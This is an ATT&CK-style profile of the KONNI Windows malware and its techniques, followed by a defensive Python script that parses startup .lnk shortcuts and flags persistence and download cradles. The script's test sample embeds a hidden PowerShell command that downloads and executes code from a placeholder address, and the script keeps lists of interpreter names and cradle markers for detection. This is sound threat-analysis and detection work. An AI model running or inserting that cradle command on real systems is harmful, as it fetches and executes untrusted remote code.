

KONNI is a Windows remote administration tool that has been seen in use since 2014 and evolved in its capabilities through at least 2017. KONNI has been linked to several campaigns involving North Korean themes.[1] KONNI has significant code overlap with the NOKKI malware family. There is some evidence potentially linking KONNI to APT37.[2][3]

ID: S0356
Platforms: Windows
Version: 1.1

Techniques Used

Domain | ID | Name | Use
Enterprise | T1115 | Clipboard Data | KONNI had a feature to steal data from the clipboard. [1]
Enterprise | T1059 | Command-Line Interface | KONNI can execute arbitrary commands on the infected host using cmd.exe. [1]
Enterprise | T1003 | Credential Dumping | KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera. [1]
Enterprise | T1083 | File and Directory Discovery | A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together. [1]
Enterprise | T1107 | File Deletion | KONNI can delete files. [1]
Enterprise | T1056 | Input Capture | KONNI has the capability to perform keylogging. [1]
Enterprise | T1036 | Masquerading | KONNI creates a shortcut called "Anti virus service.lnk" in an apparent attempt to masquerade as a legitimate file. [1]
Enterprise | T1086 | PowerShell | KONNI used PowerShell to download and execute a specific 64-bit version of the malware. [1]
Enterprise | T1060 | Registry Run Keys / Startup Folder | A version of KONNI drops a Windows shortcut into the Startup folder to establish persistence. [1]
Enterprise | T1105 | Remote File Copy | KONNI can download files and execute them on the victim’s machine. [1]
Enterprise | T1113 | Screen Capture | KONNI can take screenshots of the victim’s machine. [1]
Enterprise | T1023 | Shortcut Modification | A version of KONNI drops a Windows shortcut on the victim’s machine to establish persistence. [1]
Enterprise | T1071 | Standard Application Layer Protocol | KONNI has used HTTP for C2. [1]
Enterprise | T1082 | System Information Discovery | KONNI can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim’s machine. [1]
Enterprise | T1016 | System Network Configuration Discovery | KONNI can collect the IP address from the victim’s machine. [1]
Enterprise | T1033 | System Owner/User Discovery | KONNI can collect the username from the victim’s machine. [1]
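Several rows above (T1060 / T1023 shortcut persistence, the T1036 "Anti virus service.lnk" name, and T1086 PowerShell download-and-execute) come together in one artifact: a .lnk file sitting in a Startup folder. The following is an added example, not code from ATT&CK or from any KONNI analysis: it parses the Windows Shell Link binary format (MS-SHLLINK) just far enough to recover the target path and command-line arguments, then applies heuristic triage rules. The shortcut name comes from the entry above; the target path, the PowerShell arguments, the 192.0.2.10 address and the triage rules are constructed assumptions for illustration, not observed KONNI indicators.

```python
"""Triage .lnk files of the kind dropped into a Startup folder for persistence.

Parses enough of the Shell Link format (header, LinkInfo, StringData) to read
the target and arguments, then flags interpreter targets, download cradles,
user-writable target paths and security-product lookalike names.
"""
import os
import struct

CLSID_SHELLLINK = bytes.fromhex("0114020000000000C000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))  # StringData order fixed by the spec


def parse_lnk(data):
    """Return header flags, the LocalBasePath target and the StringData fields."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != CLSID_SHELLLINK:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos, out = 0x4C, {"flags": flags, "target": None}
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip IDList (2-byte size prefix not counted in size)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, _vol_off, local_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:                         # VolumeIDAndLocalBasePath: ANSI, NUL-terminated
            start = pos + local_off
            out["target"] = data[start:data.index(b"\x00", start)].decode("cp1252")
        pos += li_size
    width = 2 if flags & IS_UNICODE else 1
    for field, bit in STRING_FIELDS:               # each: 2-byte char count, then the characters
        if not flags & bit:
            out[field] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        raw = data[pos + 2:pos + 2 + count * width]
        out[field] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += 2 + count * width
    return out


# Hypothetical triage rules; tune to your environment.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
INTERPRETERS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe")
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex", "-enc", "http")
SECURITY_WORDS = ("anti virus", "antivirus", "defender", "security", "update")


def triage(lnk_name, parsed):
    """Return a list of findings for one shortcut; empty list means nothing flagged."""
    target = (parsed["target"] or "").lower()
    args = (parsed["arguments"] or "").lower()
    findings = []
    if any(p in target for p in USER_WRITABLE):
        findings.append("target lives in a user-writable directory")
    if any(target.endswith(i) for i in INTERPRETERS):
        findings.append("target is a command/script interpreter")
    if any(m in args for m in CRADLE_MARKERS):
        findings.append("arguments contain a download/execute cradle")
    if findings and any(w in lnk_name.lower() for w in SECURITY_WORDS):
        findings.append("shortcut name impersonates a security/system component")
    return findings


def scan_startup_folder(folder):
    """Parse every .lnk in a real folder; return {name: findings} for flagged ones."""
    hits = {}
    for entry in os.scandir(folder):
        if entry.is_file() and entry.name.lower().endswith(".lnk"):
            with open(entry.path, "rb") as fh:
                try:
                    findings = triage(entry.name, parse_lnk(fh.read()))
                except ValueError:
                    findings = ["has .lnk extension but is not a Shell Link"]
            if findings:
                hits[entry.name] = findings
    return hits


def build_lnk(target, args="", description=""):
    """Assemble a minimal .lnk (header + LinkInfo with VolumeID + StringData) for testing."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_NAME if description else 0) | (HAS_ARGUMENTS if args else 0)
    header = struct.pack("<I", 0x4C) + CLSID_SHELLLINK + struct.pack("<I", flags)
    header += b"\x00" * (0x4C - len(header))   # attributes, timestamps, sizes left zeroed
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"   # DRIVE_FIXED, empty label
    local = target.encode("cp1252") + b"\x00"
    local_off = 0x1C + len(volume_id)
    suffix_off = local_off + len(local)
    linkinfo = struct.pack("<IIIIIII", suffix_off + 1, 0x1C, 0x1, 0x1C, local_off, 0, suffix_off)
    linkinfo += volume_id + local + b"\x00"    # CommonPathSuffix is the empty string
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + linkinfo + (enc(description) if description else b"") + (enc(args) if args else b"")


# Constructed samples: name from the ATT&CK entry; target, arguments and address are hypothetical.
SUSPECT_LNK = build_lnk(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                        "-w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')",
                        "Anti virus service")
BENIGN_LNK = build_lnk(r"C:\Program Files\Vendor\tool.exe")

if __name__ == "__main__":
    for name, blob in (("Anti virus service.lnk", SUSPECT_LNK), ("Vendor Tool.lnk", BENIGN_LNK)):
        parsed = parse_lnk(blob)
        print(name, "->", parsed["target"], parsed["arguments"], triage(name, parsed) or "clean")
```

On a live host, point scan_startup_folder at the per-user and all-users Startup directories (under %APPDATA% and %ProgramData% respectively); the parser deliberately stops at StringData, so ExtraData blocks such as an environment-variable target are not resolved and a shortcut relying on them shows an empty target, which is itself worth a look.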